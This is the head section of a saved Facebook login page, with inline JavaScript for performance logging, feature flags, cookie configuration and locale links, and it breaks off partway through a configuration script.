<!DOCTYPE html>
<html lang="en" id="facebook" class="no_js">
<head>
<meta charset="utf-8" />
<meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" />
<script nonce="nHhiRPia">
window._cstart = +new Date();
</script>
<script nonce="nHhiRPia">
function envFlush(a) {
function b(b) {
for (var c in a) b[c] = a[c]
}
window.requireLazy ? window.requireLazy(["Env"], b) : (window.Env = window.Env || {}, b(window.Env))
}
envFlush({
"ajaxpipe_token": "AXgEuNKfYsPwJgoRLg4",
"timeslice_heartbeat_config": {
"pollIntervalMs": 33,
"idleGapThresholdMs": 60,
"ignoredTimesliceNames": {
"requestAnimationFrame": true,
"Event listenHandler mousemove": true,
"Event listenHandler mouseover": true,
"Event listenHandler mouseout": true,
"Event listenHandler scroll": true
},
"isHeartbeatEnabled": true,
"isArtilleryOn": false
},
"shouldLogCounters": true,
"timeslice_categories": {
"react_render": true,
"reflow": true
},
"sample_continuation_stacktraces": true,
"dom_mutation_flag": true,
"gk_requirelazy_mem": true,
"stack_trace_limit": 30,
"timesliceBufferSize": 5000,
"show_invariant_decoder": false,
"compat_iframe_token": "AQ6SvIADXmglN96xKGo",
"isCQuick": false
});
</script>
<style nonce="nHhiRPia"></style>
<script nonce="nHhiRPia">
__DEV__ = 0;
CavalryLogger = window.CavalryLogger || function (a) {
this.lid = a, this.transition = !1, this.metric_collected = !1, this.is_detailed_profiler = !1, this
.instrumentation_started = !1, this.pagelet_metrics = {}, this.events = {}, this.ongoing_watch = {},
this.values = {
t_cstart: window._cstart
}, this.piggy_values = {}, this.bootloader_metrics = {}, this.resource_to_pagelet_mapping = {}, this
.initializeInstrumentation && this.initializeInstrumentation()
}, CavalryLogger.prototype.setIsDetailedProfiler = function (a) {
this.is_detailed_profiler = a;
return this
}, CavalryLogger.prototype.setTTIEvent = function (a) {
this.tti_event = a;
return this
}, CavalryLogger.prototype.setValue = function (a, b, c, d) {
d = d ? this.piggy_values : this.values;
(typeof d[a] === "undefined" || c) && (d[a] = b);
return this
}, CavalryLogger.prototype.getLastTtiValue = function () {
return this.lastTtiValue
}, CavalryLogger.prototype.setTimeStamp = CavalryLogger.prototype.setTimeStamp || function (a, b, c, d) {
this.mark(a);
var e = this.values.t_cstart || this.values.t_start;
e = d ? e + d : CavalryLogger.now();
this.setValue(a, e, b, c);
this.tti_event && a == this.tti_event && (this.lastTtiValue = e, this.setTimeStamp("t_tti", b));
return this
}, CavalryLogger.prototype.mark = typeof console === "object" && console.timeStamp ? function (a) {
console.timeStamp(a)
} : function () {}, CavalryLogger.prototype.addPiggyback = function (a, b) {
this.piggy_values[a] = b;
return this
}, CavalryLogger.instances = {}, CavalryLogger.id = 0, CavalryLogger.getInstance = function (a) {
typeof a === "undefined" && (a = CavalryLogger.id);
CavalryLogger.instances[a] || (CavalryLogger.instances[a] = new CavalryLogger(a));
return CavalryLogger.instances[a]
}, CavalryLogger.setPageID = function (a) {
if (CavalryLogger.id === 0) {
var b = CavalryLogger.getInstance();
CavalryLogger.instances[a] = b;
CavalryLogger.instances[a].lid = a;
delete CavalryLogger.instances[0]
}
CavalryLogger.id = a
}, CavalryLogger.now = function () {
return window.performance && performance.timing && performance.timing.navigationStart && performance
.now ? performance.now() + performance.timing.navigationStart : new Date().getTime()
}, CavalryLogger.prototype.measureResources = function () {}, CavalryLogger.prototype
.profileEarlyResources = function () {}, CavalryLogger.getBootloaderMetricsFromAllLoggers = function () {},
CavalryLogger.start_js = function () {}, CavalryLogger.done_js = function () {};
CavalryLogger.getInstance().setTTIEvent("t_domcontent");
CavalryLogger.prototype.measureResources = function (a, b) {
if (!this.log_resources) return;
var c = "bootload/" + a.name;
if (this.bootloader_metrics[c] !== void 0 || this.ongoing_watch[c] !== void 0) return;
var d = CavalryLogger.now();
this.ongoing_watch[c] = d;
"start_" + c in this.bootloader_metrics || (this.bootloader_metrics["start_" + c] = d);
b && !("tag_" + c in this.bootloader_metrics) && (this.bootloader_metrics["tag_" + c] = b);
if (a.type === "js") {
c = "js_exec/" + a.name;
this.ongoing_watch[c] = d
}
}, CavalryLogger.prototype.stopWatch = function (a) {
if (this.ongoing_watch[a]) {
var b = CavalryLogger.now(),
c = b - this.ongoing_watch[a];
this.bootloader_metrics[a] = c;
var d = this.piggy_values;
a.indexOf("bootload") === 0 && (d.t_resource_download || (d.t_resource_download = 0), d
.resources_downloaded || (d.resources_downloaded = 0), d.t_resource_download += c, d
.resources_downloaded += 1, d["tag_" + a] == "_EF_" && (d
.t_pagelet_cssload_early_resources = b));
delete this.ongoing_watch[a]
}
return this
}, CavalryLogger.getBootloaderMetricsFromAllLoggers = function () {
var a = {};
Object.values(window.CavalryLogger.instances).forEach(function (b) {
b.bootloader_metrics && Object.assign(a, b.bootloader_metrics)
});
return a
}, CavalryLogger.start_js = function (a) {
for (var b = 0; b < a.length; ++b) CavalryLogger.getInstance().stopWatch("js_exec/" + a[b])
}, CavalryLogger.done_js = function (a) {
for (var b = 0; b < a.length; ++b) CavalryLogger.getInstance().stopWatch("bootload/" + a[b])
}, CavalryLogger.prototype.profileEarlyResources = function (a) {
for (var b = 0; b < a.length; b++) this.measureResources({
name: a[b][0],
type: a[b][1] ? "js" : ""
}, "_EF_")
};
CavalryLogger.getInstance().log_resources = true;
CavalryLogger.getInstance().setIsDetailedProfiler(true);
window.CavalryLogger && CavalryLogger.getInstance().setTimeStamp("t_start");
</script><noscript>
<meta http-equiv="refresh" content="0; URL=/?_fb_noscript=1" /></noscript>
<link rel="manifest" href="/data/manifest/" crossorigin="use-credentials" />
<title id="pageTitle">Facebook – log in or sign up</title>
<meta property="og:site_name" content="Facebook" />
<meta property="og:url" content="https://www.facebook.com/" />
<meta property="og:image" content="https://www.facebook.com/images/fb_icon_325x325.png" />
<meta property="og:locale" content="en_GB" />
<script type="application/ld+json" nonce="nHhiRPia">
{
"\u0040context": "http:\/\/schema.org",
"\u0040type": "WebSite",
"name": "Facebook",
"url": "https:\/\/www.facebook.com\/"
}
</script>
<link rel="search" type="application/opensearchdescription+xml" href="/osd.xml" title="Facebook" />
<link rel="canonical" href="https://www.facebook.com/" />
<link rel="alternate" media="only screen and (max-width: 640px)" href="https://m.facebook.com/?locale2=en_GB" />
<link rel="alternate" media="handheld" href="https://m.facebook.com/?locale2=en_GB" />
<link rel="alternate" hreflang="x-default" href="https://www.facebook.com/" />
<link rel="alternate" hreflang="en" href="https://www.facebook.com/" />
<link rel="alternate" hreflang="ar" href="https://ar-ar.facebook.com/" />
<link rel="alternate" hreflang="bg" href="https://bg-bg.facebook.com/" />
<link rel="alternate" hreflang="bs" href="https://bs-ba.facebook.com/" />
<link rel="alternate" hreflang="ca" href="https://ca-es.facebook.com/" />
<link rel="alternate" hreflang="da" href="https://da-dk.facebook.com/" />
<link rel="alternate" hreflang="el" href="https://el-gr.facebook.com/" />
<link rel="alternate" hreflang="es" href="https://es-la.facebook.com/" />
<link rel="alternate" hreflang="es-es" href="https://es-es.facebook.com/" />
<link rel="alternate" hreflang="fa" href="https://fa-ir.facebook.com/" />
<link rel="alternate" hreflang="fi" href="https://fi-fi.facebook.com/" />
<link rel="alternate" hreflang="fr" href="https://fr-fr.facebook.com/" />
<link rel="alternate" hreflang="fr-ca" href="https://fr-ca.facebook.com/" />
<link rel="alternate" hreflang="hi" href="https://hi-in.facebook.com/" />
<link rel="alternate" hreflang="hr" href="https://hr-hr.facebook.com/" />
<link rel="alternate" hreflang="id" href="https://id-id.facebook.com/" />
<link rel="alternate" hreflang="it" href="https://it-it.facebook.com/" />
<link rel="alternate" hreflang="ko" href="https://ko-kr.facebook.com/" />
<link rel="alternate" hreflang="mk" href="https://mk-mk.facebook.com/" />
<link rel="alternate" hreflang="ms" href="https://ms-my.facebook.com/" />
<link rel="alternate" hreflang="pl" href="https://pl-pl.facebook.com/" />
<link rel="alternate" hreflang="pt" href="https://pt-br.facebook.com/" />
<link rel="alternate" hreflang="pt-pt" href="https://pt-pt.facebook.com/" />
<link rel="alternate" hreflang="ro" href="https://ro-ro.facebook.com/" />
<link rel="alternate" hreflang="sl" href="https://sl-si.facebook.com/" />
<link rel="alternate" hreflang="sr" href="https://sr-rs.facebook.com/" />
<link rel="alternate" hreflang="th" href="https://th-th.facebook.com/" />
<link rel="alternate" hreflang="vi" href="https://vi-vn.facebook.com/" />
<meta name="description"
content="Create an account or log in to Facebook. Connect with friends, family and other people you know. Share photos and videos, send messages and get updates." />
<meta name="robots" content="noodp,noydir" />
<link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yo/r/iRmz9lCMBD2.ico" />
<link type="text/css" rel="stylesheet"
href="https://static.xx.fbcdn.net/rsrc.php/v3/yf/l/0,cross/asXbW0EF74d.css?_nc_x=Ij3Wp8lg5Kz"
data-bootloader-hash="KrT1e" crossorigin="anonymous" />
<link type="text/css" rel="stylesheet"
href="https://static.xx.fbcdn.net/rsrc.php/v3/yH/l/0,cross/rshiL2tOkCG.css?_nc_x=Ij3Wp8lg5Kz"
data-bootloader-hash="Ouygn" crossorigin="anonymous" />
<link type="text/css" rel="stylesheet"
href="https://static.xx.fbcdn.net/rsrc.php/v3/yn/l/0,cross/HPXapuc0p5v.css?_nc_x=Ij3Wp8lg5Kz"
data-bootloader-hash="eeYF5" crossorigin="anonymous" />
<link type="text/css" rel="stylesheet"
href="https://static.xx.fbcdn.net/rsrc.php/v3/yl/l/0,cross/sBZ6cM2f6IJ.css?_nc_x=Ij3Wp8lg5Kz"
data-bootloader-hash="81DSB" crossorigin="anonymous" />
<link type="text/css" rel="stylesheet"
href="https://static.xx.fbcdn.net/rsrc.php/v3/yV/l/0,cross/kDQHM2iUCTj.css?_nc_x=Ij3Wp8lg5Kz"
data-bootloader-hash="TYks2" crossorigin="anonymous" />
<link type="text/css" rel="stylesheet"
href="https://static.xx.fbcdn.net/rsrc.php/v3/yB/l/0,cross/J-keP3TYvXv.css?_nc_x=Ij3Wp8lg5Kz"
data-bootloader-hash="RtFLV" data-nonblocking="1" crossorigin="anonymous" />
<link type="text/css" rel="stylesheet"
href="https://static.xx.fbcdn.net/rsrc.php/v3/y6/l/0,cross/iWbQtMrJW8n.css?_nc_x=Ij3Wp8lg5Kz"
data-bootloader-hash="4l/Jz" crossorigin="anonymous" />
<script src="https://static.xx.fbcdn.net/rsrc.php/v3/yH/r/COFZ7ITuwSz.js?_nc_x=Ij3Wp8lg5Kz"
data-bootloader-hash="mQtA7" crossorigin="anonymous" nonce="nHhiRPia"></script>
<script nonce="nHhiRPia">
requireLazy(["HasteSupportData"], function (m) {
m.handle({
"clpData": {
"1814852": {
"r": 1
},
"1838142": {
"r": 1,
"s": 1
},
"1949898": {
"r": 1
},
"1848815": {
"r": 10000,
"s": 1
},
"1744178": {
"r": 1,
"s": 1
}
},
"gkxData": {
"676837": {
"result": false,
"hash": "AT4N8wBZA8ctCdHwh3I"
},
"708253": {
"result": false,
"hash": "AT5n4hBL3YTMnQWtVGg"
},
"996940": {
"result": false,
"hash": "AT7opYuEGy3sjG1aNfo"
},
"1224637": {
"result": false,
"hash": "AT7JRluWxuwDm3Xz4Ac"
},
"1263340": {
"result": false,
"hash": "AT5bwizWgDaFQudmt_I"
},
"676920": {
"result": true,
"hash": "AT497IX4gOFG8gZeAaE"
},
"1073500": {
"result": true,
"hash": "AT7aJmfnqWyioxOOBKQ"
},
"1167394": {
"result": false,
"hash": "AT7BpN-tlUPwbIIFlt4"
},
"1857581": {
"result": false,
"hash": "AT5yTxGMp6le0PAts1w"
},
"1952739": {
"result": true,
"hash": "AT4Zq7lXWSlD3PCk7JQ"
},
"1955413": {
"result": true,
"hash": "AT5Tny0Wtlel6ZKHPCI"
},
"676838": {
"result": false,
"hash": "AT6nN1ehT9yq-2q6CHQ"
},
"1164245": {
"result": false,
"hash": "AT6TXkLkBb9tdH3bQjQ"
},
"1217157": {
"result": false,
"hash": "AT6B7YmllOsArnK6oYw"
},
"1554827": {
"result": false,
"hash": "AT7zueGLhGo0cT5xUQI"
},
"1738486": {
"result": false,
"hash": "AT4cX37oQco6DwhUABI"
},
"1787898": {
"result": true,
"hash": "AT5WGsLz9GCUYq8UItM"
}
}
})
});
requireLazy(["TimeSliceImpl", "ServerJS"], function (TimeSlice, ServerJS) {
(new ServerJS()).handle({
"define": [
["URLFragmentPreludeConfig", [], {
"hashtagRedirect": true,
"fragBlacklist": ["nonce", "access_token", "oauth_token", "xs",
"checkpoint_data", "code"
]
}, 137],
["BootloaderConfig", [], {
"deferBootloads": false,
"jsRetries": [200, 500],
"jsRetryAbortNum": 2,
"jsRetryAbortTime": 5,
"jsResourcePreloadFull": false,
"retryQueuedBootloads": false,
"silentDups": false
}, 329],
["CSSLoaderConfig", [], {
"timeout": 5000,
"modulePrefix": "BLCSS:",
"loadEventSupported": true
}, 619],
["CookieCoreConfig", [], {
"a11y": {
"s": "None"
},
"c_user": {
"s": "None"
},
"cppo": {
"t": 86400,
"s": "None"
},
"dpr": {
"t": 604800,
"s": "None"
},
"fbl_ci": {
"t": 31536000,
"s": "None"
},
"fbl_cs": {
"t": 31536000,
"s": "None"
},
"fbl_st": {
"t": 31536000,
"s": "Strict"
},
"i_user": {
"s": "None"
},
"js_ver": {
"t": 604800,
"s": "None"
},
"locale": {
"t": 604800,
"s": "None"
},
"m_pixel_ratio": {
"t": 604800,
"s": "None"
},
"noscript": {
"s": "None"
},
"presence": {
"t": 2592000,
"s": "None"
},
"sfau": {
"s": "None"
},
"vpd": {
"t": 5184000,
"s": "Lax"
},
"wd": {
"t": 604800,
"s": "Lax"
},
"x-referer": {
"s": "None"
},
"x-src": {
"t": 1,
"s": "None"
}
}, 2104],
["CurrentCommunityInitialData", [], {}, 490],
["CurrentEnvironment", [], {
"facebookdotcom": true,
"messengerdotcom": false,
"workplacedotcom": false
}, 827],
["CurrentUserInitialData", [], {
"USER_ID": "0",
"ACCOUNT_ID": "0",
"NAME": "",
"SHORT_NAME": null,
"IS_BUSINESS_PERSON_ACCOUNT": false,
"HAS_SECONDARY_BUSINESS_PERSON": false,
"IS_MESSENGER_ONLY_USER": false,
"IS_DEACTIVATED_ALLOWED_ON_MESSENGER": false,
"IS_MESSENGER_CALL_GUEST_USER": false,
"IS_WORK_MESSENGER_CALL_GUEST_USER": false,
"APP_ID": "256281040558",
"IS_BUSINESS_DOMAIN": false
}, 270],
["DTSGInitialData", [], {}, 258],
["ISB", [], {}, 330],
["LSD", [], {
"token": "AVqhdBwnN2Q"
}, 323],
["ServerNonce", [], {
"ServerNonce": "QNdkso7u6kQJAhPSlug8tj"
}, 141],
["SiteData", [], {
"server_revision": 1003448310,
"client_revision": 1003448310,
"tier": "",
"push_phase": "C3",
"pkg_cohort": "PHASED:DEFAULT",
"pr": 1,
"haste_site": "www",
"be_one_ahead": false,
"ir_on": true,
"is_rtl": false,
"is_comet": false,
"is_experimental_tier": false,
"is_jit_warmed_up": true,
"hsi": "6939598592736256614-0",
"semr_host_bucket": "5",
"bl_hash_version": 1,
"spin": 4,
"__spin_r": 1003448310,
"__spin_b": "trunk",
"__spin_t": 1615751207,
"vip": "69.171.250.35"
}, 317],
["SprinkleConfig", [], {
"param_name": "jazoest",
"version": 2,
"should_randomize": false
}, 2111],
["UserAgentData", [], {
"browserArchitecture": "64",
"browserFullVersion": "88.0.4324.190",
"browserMinorVersion": 0,
"browserName": "Chrome",
"browserVersion": 88,
"deviceName": "Unknown",
"engineName": "WebKit",
"engineVersion": "537.36",
"platformArchitecture": "64",
"platformName": "Windows",
"platformVersion": "8",
"platformFullVersion": "8.1"
}, 527],
["PromiseUsePolyfillSetImmediateGK", [], {
"www_always_use_polyfill_setimmediate": false
}, 2190],
["KSConfig", [], {
"killed": {
"__set": [
"EO_DISABLE_SYSTEM_SERIAL_NUMBER_FREE_TYPING_IN_CPE_NON_CLIENT",
"POCKET_MONSTERS_CREATE", "POCKET_MONSTERS_DELETE",
"VIDEO_DIMENSIONS_FROM_PLAYER_IN_UPLOAD_DIALOG",
"POCKET_MONSTERS_UPDATE_NAME",
"ADS_PLACEMENT_FIX_PUBLISHER_PLATFORMS_MUTATION",
"MOBILITY_KILL_OLD_VISIBILITY_POSITION_SETTING",
"WORKPLACE_DISPLAY_TEXT_EVIDENCE_REPORTING",
"DYNAMIC_ADS_SET_CATALOG_AND_PRODUCT_SET_TOGETHER",
"BUSINESS_GRAPH_SETTING_APP_ASSIGNED_USERS_NEW_API",
"BUSINESS_GRAPH_SETTING_WABA_ASSIGNED_USERS_NEW_API",
"BUSINESS_GRAPH_SETTING_ESG_ASSIGNED_USERS_NEW_API",
"BUSINESS_GRAPH_SETTING_PRODUCT_CATALOG_ASSIGNED_USERS_NEW_API",
"BUSINESS_GRAPH_SETTING_BU_ASSIGNED_USERS_NEW_API",
"BUSINESS_GRAPH_SETTING_SESG_ASSIGNED_USERS_NEW_API",
"WORKPLACE_PLATFORM_SECURE_APPS_MAILBOXES",
"LAB_NET_NEW_UI_RELEASE",
"EO_SRT_HELPDESK_DASHBOARD_DISABLE_UNUSED_TAB_IN_RIGHT_PANEL",
"BUSINESS_INVITE_FLOW_WITH_SELLER_PROFILE",
"HELPDESK_USE_XDS_SEARCHABLE_INPUT_FOR_WORKFLOW",
"MLHUB_FLOW_AUTOREFRESH_SEARCH",
"AD_DRAFT_ENABLE_SYNCRHONOUS_FRAGMENT_VALIDATION",
"NEKO_DISABLE_CREATE_FOR_SAP", "SIMPL_SAMPLING_HEALTH_CARD",
"NEKO_ENABLE_RESET_SAP_FOR_CREATE_AD_SET_CONTEXTUAL",
"ADS_TEMPLATE_UNIFICATION_IN_IG_STORIES",
"IG_ADS_HIDE_LEGACY_ACCOUNT_CREATION",
"BUY_AT_NEW_START_REQUEST_DSUL_BANNER",
"BUY_AT_UI_LINE_DELETE", "SRT_BANZAI_SRT_CORE_LOGGER",
"SRT_BANZAI_SRT_MAIN_LOGGER"
]
},
"ko": {
"__set": ["9NpkGYwzrPG", "acrJTh9WGdp", "1oOE64fL4wO",
"2dhqRnqXGLQ", "7r6mSP7ofr2", "1ntjZ2zgf03", "3oh5Mw86USj",
"8NAceEy9JZo", "5mNEXob0nTj", "4j36SVzvP3w", "8PlKuowafe8",
"53gCxKq281G", "3yzzwBY7Npj", "4NSq3ZC4ScE", "1onzIv0jH6H",
"5XCz1h9Iaw3", "DDZhogI19W", "6fHw06UmAMW", "7FOIzos6XJX",
"aDayprn6pbH", "3OsLvnSHNTt", "8rDvN9vWdAK", "1G7wJ6bJt9K",
"4MzX0ipjWq", "9cL5o2kjfZo", "6xuJHOrdskA", "5QNbQVDdW8s",
"80ZDn9dpjEA", "rf8JEPGgOi", "9Gd8qgRxn8z", "MPMaqnqZ9c"
]
}
}, 2580],
["JSErrorLoggingConfig", [], {
"appId": 256281040558,
"extra": [],
"reportInterval": 50,
"sampleWeight": null,
"sampleWeightKey": "__jssesw"
}, 2776],
["CookieCoreLoggingConfig", [], {
"maximumIgnorableStallMs": 16.67,
"sampleRate": 9.7e-5,
"sampleRateClassic": 1.0e-10,
"sampleRateFastStale": 1.0e-8
}, 3401],
["ImmediateImplementationExperiments", [], {
"prefer_message_channel": true
}, 3419],
["DTSGInitData", [], {
"token": "",
"async_get_token": ""
}, 3515],
["UriNeedRawQuerySVConfig", [], {
"uris": ["dms.netmng.com", "doubleclick.net", "r.msn.com",
"watchit.sky.com", "graphite.instagram.com", "www.kfc.co.th",
"learn.pantheon.io", "www.landmarkshops.in", "www.ncl.com",
"s0.wp.com", "www.tatacliq.com", "bs.serving-sys.com",
"kohls.com", "lazada.co.th", "xg4ken.com", "technopark.ru",
"officedepot.com.mx", "bestbuy.com.mx", "booking.com"
]
}, 3871],
["InitialCookieConsent", [], {
"deferCookies": false,
"initialConsent": {
"__set": [1, 2]
},
"noCookies": false,
"shouldShowCookieBanner": false
}, 4328],
["TrustedTypesConfig", [], {
"useTrustedTypes": false,
"reportOnly": true
}, 4548],
["WebConnectionClassServerGuess", [], {
"connectionClass": "MODERATE"
}, 4705],
["CometAltpayJsSdkIframeAllowedDomains", [], {
"allowed_domains": ["https:\/\/live.adyen.com",
"https:\/\/integration-facebook.payu.in",
"https:\/\/facebook.payulatam.com", "https:\/\/secure.payu.com",
"https:\/\/facebook.dlocal.com", "https:\/\/buy2.boku.com"
]
}, 4920],
["BootloaderEndpointConfig", [], {
"debugNoBatching": false,
"endpointURI": "https:\/\/www.facebook.com\/ajax\/bootloader-endpoint\/"
}, 5094],
["BigPipeExperiments", [], {
"link_images_to_pagelets": false,
"enable_bigpipe_plugins": false
}, 907],
["AsyncRequestConfig", [], {
"retryOnNetworkError": "1",
"useFetchStreamAjaxPipeTransport": false
}, 328],
["FbtQTOverrides", [], {
"overrides": {}
}, 551],
["FbtResultGK", [], {
"shouldReturnFbtResult": true,
"inlineMode": "NO_INLINE"
}, 876],
["IntlPhonologicalRules", [], {
"meta": {
"\/_B\/": "([.,!?\\s]|^)",
"\/_E\/": "([.,!?\\s]|$)"
},
"patterns": {
"\/\u0001(.*)('|')s\u0001(?:'|')s(.*)\/": "\u0001$1$2s\u0001$3",
"\/_\u0001([^\u0001]*)\u0001\/": "javascript"
}
}, 1496],
["IntlViewerContext", [], {
"GENDER": 3
}, 772],
["NumberFormatConfig", [], {
"decimalSeparator": ".",
"numberDelimiter": ",",
"minDigitsForThousandsSeparator": 4,
"standardDecimalPatternInfo": {
"primaryGroupSize": 3,
"secondaryGroupSize": 3
},
"numberingSystemData": null
}, 54],
["SessionNameConfig", [], {
"seed": "1HPO"
}, 757],
["ZeroCategoryHeader", [], {}, 1127],
["ZeroRewriteRules", [], {
"rewrite_rules": {},
"whitelist": {
"\/hr\/r": 1,
"\/hr\/p": 1,
"\/zero\/unsupported_browser\/": 1,
"\/zero\/policy\/optin": 1,
"\/zero\/optin\/write\/": 1,
"\/zero\/optin\/legal\/": 1,
"\/zero\/optin\/free\/": 1,
"\/about\/privacy\/": 1,
"\/about\/privacy\/update\/": 1,
"\/about\/privacy\/update": 1,
"\/zero\/toggle\/welcome\/": 1,
"\/zero\/toggle\/nux\/": 1,
"\/zero\/toggle\/settings\/": 1,
"\/fup\/interstitial\/": 1,
"\/work\/landing": 1,
"\/work\/login\/": 1,
"\/work\/email\/": 1,
"\/ai.php": 1,
"\/js_dialog_resources\/dialog_descriptions_android.json": 0,
"\/connect\/jsdialog\/MPlatformAppInvitesJSDialog\/": 0,
"\/connect\/jsdialog\/MPlatformOAuthShimJSDialog\/": 0,
"\/connect\/jsdialog\/MPlatformLikeJSDialog\/": 0,
"\/qp\/interstitial\/": 1,
"\/qp\/action\/redirect\/": 1,
"\/qp\/action\/close\/": 1,
"\/zero\/support\/ineligible\/": 1,
"\/zero_balance_redirect\/": 1,
"\/zero_balance_redirect": 1,
"\/zero_balance_redirect\/l\/": 1,
"\/l.php": 1,
"\/lsr.php": 1,
"\/ajax\/dtsg\/": 1,
"\/checkpoint\/block\/": 1,
"\/exitdsite": 1,
"\/zero\/balance\/pixel\/": 1,
"\/zero\/balance\/": 1,
"\/zero\/balance\/carrier_landing\/": 1,
"\/zero\/flex\/logging\/": 1,
"\/tr": 1,
"\/tr\/": 1,
"\/sem_campaigns\/sem_pixel_test\/": 1,
"\/bookmarks\/flyout\/body\/": 1,
"\/zero\/subno\/": 1,
"\/confirmemail.php": 1,
"\/policies\/": 1,
"\/mobile\/internetdotorg\/classifier\/": 1,
"\/zero\/dogfooding": 1,
"\/xti.php": 1,
"\/zero\/fblite\/config\/": 1,
"\/hr\/zsh\/wc\/": 1,
"\/ajax\/bootloader-endpoint\/": 1,
"\/mobile\/zero\/carrier_page\/": 1,
"\/mobile\/zero\/carrier_page\/education_page\/": 1,
"\/mobile\/zero\/carrier_page\/feature_switch\/": 1,
"\/mobile\/zero\/carrier_page\/settings_page\/": 1,
"\/aloha_check_build": 1,
"\/4oh4.php": 1,
"\/autologin.php": 1,
"\/birthday_help.php": 1,
"\/checkpoint\/": 1,
"\/contact-importer\/": 1,
"\/cr.php": 1,
"\/legal\/terms\/": 1,
"\/login.php": 1,
"\/login\/": 1,
"\/mobile\/account\/": 1,
"\/n\/": 1,
"\/remote_test_device\/": 1,
"\/upsell\/buy\/": 1,
"\/upsell\/buyconfirm\/": 1,
"\/upsell\/buyresult\/": 1,
"\/upsell\/promos\/": 1,
"\/upsell\/continue\/": 1,
"\/upsell\/h\/promos\/": 1,
"\/upsell\/loan\/learnmore\/": 1,
"\/upsell\/purchase\/": 1,
"\/upsell\/promos\/upgrade\/": 1,
"\/upsell\/buy_redirect\/": 1,
"\/upsell\/loan\/buyconfirm\/": 1,
"\/upsell\/loan\/buy\/": 1,
"\/upsell\/sms\/": 1,
"\/wap\/a\/channel\/reconnect.php": 1,
"\/wap\/a\/nux\/wizard\/nav.php": 1,
"\/wap\/appreg.php": 1,
"\/wap\/birthday_help.php": 1,
"\/wap\/c.php": 1,
"\/wap\/confirmemail.php": 1,
"\/wap\/cr.php": 1,
"\/wap\/login.php": 1,
"\/wap\/r.php": 1,
"\/zero\/datapolicy": 1,
"\/a\/timezone.php": 1,
"\/a\/bz": 1,
"\/bz\/reliability": 1,
"\/r.php": 1,
"\/mr\/": 1,
"\/reg\/": 1,
"\/registration\/log\/": 1,
"\/terms\/": 1,
"\/f123\/": 1,
"\/expert\/": 1,
"\/experts\/": 1,
"\/terms\/index.php": 1,
"\/terms.php": 1,
"\/srr\/": 1,
"\/msite\/redirect\/": 1,
"\/fbs\/pixel\/": 1,
"\/contactpoint\/preconfirmation\/": 1,
"\/contactpoint\/cliff\/": 1,
"\/contactpoint\/confirm\/submit\/": 1,
"\/contactpoint\/confirmed\/": 1,
"\/contactpoint\/login\/": 1,
"\/preconfirmation\/contactpoint_change\/": 1,
"\/help\/contact\/": 1,
"\/survey\/": 1,
"\/upsell\/loyaltytopup\/accept\/": 1,
"\/settings\/": 1,
"\/lite\/": 1,
"\/zero_status_update\/": 1,
"\/operator_store\/": 1,
"\/upsell\/": 1
}
}, 1478],
["IntlNumberTypeConfig", [], {
"impl": "if (n === 1) { return IntlVariations.NUMBER_ONE; } else { return IntlVariations.NUMBER_OTHER; }"
}, 3405],
["DataStoreConfig", [], {
"expandoKey": "__FB_STORE",
"useExpando": true
}, 2915],
["AnalyticsCoreData", [], {
"device_id": "$^|AcbXaXHY5gAnYK7gHxqSsa1L1gj83Adp5WR_fejNmpLavlIw7VYy-ViY_zb-Bg3Da_vxUnKLa2_t3pLwdHIVteIjBnP75Mo|fd.AcYPv6Ypuwy4p2oGLNNw6kyN54Jj7YJsSgs8qOBVgIlVbALGye4gpcNXaBGVVz0nwvHziIIDhMfwN5FO2as-WQMv",
"app_id": "256281040558",
"enable_bladerunner": false,
"enable_localstorage": true,
"enable_ack": false,
"attach": false,
"enable_batching": true,
"push_phase": "C3",
"enable_ods": true
}, 5237],
["cr:696703", [], {
"__rc": [null,
"Aa3QU5erRjzHtjJ94CtINFDR8IMHcYqhh0ITTyNgjRH0CtSF-R2NiRot5wgGbGgrYqtU_YPRyshUE13-VjVJuxKu1y0"
]
}, -1],
["cr:708886", ["EventProfilerImpl"], {
"__rc": ["EventProfilerImpl",
"Aa3QU5erRjzHtjJ94CtINFDR8IMHcYqhh0ITTyNgjRH0CtSF-R2NiRot5wgGbGgrYqtU_YPRyshUE13-VjVJuxKu1y0"
]
}, -1],
["cr:717822", ["TimeSliceImpl"], {
"__rc": ["TimeSliceImpl",
"Aa3QU5erRjzHtjJ94CtINFDR8IMHcYqhh0ITTyNgjRH0CtSF-R2NiRot5wgGbGgrYqtU_YPRyshUE13-VjVJuxKu1y0"
]
}, -1],
["cr:806696", ["clearTimeoutBlue"], {
"__rc": ["clearTimeoutBlue",
"Aa3QU5erRjzHtjJ94CtINFDR8IMHcYqhh0ITTyNgjRH0CtSF-R2NiRot5wgGbGgrYqtU_YPRyshUE13-VjVJuxKu1y0"
]
}, -1],
["cr:807042", ["setTimeoutBlue"], {
"__rc": ["setTimeoutBlue",
"Aa3QU5erRjzHtjJ94CtINFDR8IMHcYqhh0ITTyNgjRH0CtSF-R2NiRot5wgGbGgrYqtU_YPRyshUE13-VjVJuxKu1y0"
]
}, -1],
["cr:896462", ["setIntervalAcrossTransitionsBlue"], {
"__rc": ["setIntervalAcrossTransitionsBlue",
"Aa3QU5erRjzHtjJ94CtINFDR8IMHcYqhh0ITTyNgjRH0CtSF-R2NiRot5wgGbGgrYqtU_YPRyshUE13-VjVJuxKu1y0"
]
}, -1],
["cr:986633", ["setTimeoutAcrossTransitionsBlue"], {
"__rc": ["setTimeoutAcrossTransitionsBlue",
"Aa3QU5erRjzHtjJ94CtINFDR8IMHcYqhh0ITTyNgjRH0CtSF-R2NiRot5wgGbGgrYqtU_YPRyshUE13-VjVJuxKu1y0"
]
}, -1],
["cr:1003267", ["clearIntervalBlue"], {
"__rc": ["clearIntervalBlue",
"Aa3QU5erRjzHtjJ94CtINFDR8IMHcYqhh0ITTyNgjRH0CtSF-R2NiRot5wgGbGgrYqtU_YPRyshUE13-VjVJuxKu1y0"
]
}, -1],
["cr:1183579", ["InlineFbtResultImpl"], {
"__rc": ["InlineFbtResultImpl",
"Aa3QU5erRjzHtjJ94CtINFDR8IMHcYqhh0ITTyNgjRH0CtSF-R2NiRot5wgGbGgrYqtU_YPRyshUE13-VjVJuxKu1y0"
]
}, -1],
["cr:925100", ["RunBlue"], {
"__rc": ["RunBlue",
"Aa3QU5erRjzHtjJ94CtINFDR8IMHcYqhh0ITTyNgjRH0CtSF-R2NiRot5wgGbGgrYqtU_YPRyshUE13-VjVJuxKu1y0"
]
}, -1],
["cr:1642797", ["BanzaiBase"], {
"__rc": ["BanzaiBase",
